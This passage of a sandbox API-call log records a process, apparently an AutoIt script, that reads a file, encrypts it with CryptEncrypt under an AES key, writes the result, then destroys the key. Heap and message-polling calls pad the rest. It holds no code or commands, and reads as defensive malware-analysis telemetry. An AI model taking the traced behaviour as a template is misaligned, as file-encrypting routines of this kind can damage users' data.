hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.349] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0124.349] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0124.349] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0124.350] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0124.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0124.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0124.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0124.353] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0124.353] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x6e44, lpOverlapped=0x0) returned 1 [0124.355] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0124.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0124.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0124.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6e44) returned 0x49aa010 [0124.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0124.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0124.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0124.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6e44) returned 0x49b0e60 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.460] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0124.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6e44) returned 0x49aa010 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0124.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.460] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0124.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0124.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0124.461] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0124.461] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0124.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0124.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6e44) returned 0x49aa010 [0124.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0124.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0124.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0124.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6e44) returned 0x49b7cb0 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.463] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.463] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0124.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0124.464] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0124.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0124.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0124.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0124.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0124.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0124.465] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2880, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2880*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0124.466] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.466] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.466] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.466] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x6e44, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x6e50) returned 1 [0124.466] CharLowerBuffW (in: lpsz="byte[28241]", cchLength=0xb | out: lpsz="byte[28241]") returned 0xb [0124.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caeb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.467] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49beb00*, pdwDataLen=0x144e790*=0x6e44, dwBufLen=0x6e50 | out: pbData=0x49beb00*, pdwDataLen=0x144e790*=0x6e50) returned 1 [0124.467] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.469] WriteFile (in: hFile=0x2a0, lpBuffer=0x49e12c8*, nNumberOfBytesToWrite=0x6e50, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49e12c8*, lpNumberOfBytesWritten=0x144f194*=0x6e50, lpOverlapped=0x0) returned 1 [0124.470] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0124.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.470] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0124.471] CryptDestroyKey (hKey=0x41ac140) returned 1 [0124.471] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.471] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.471] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.471] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 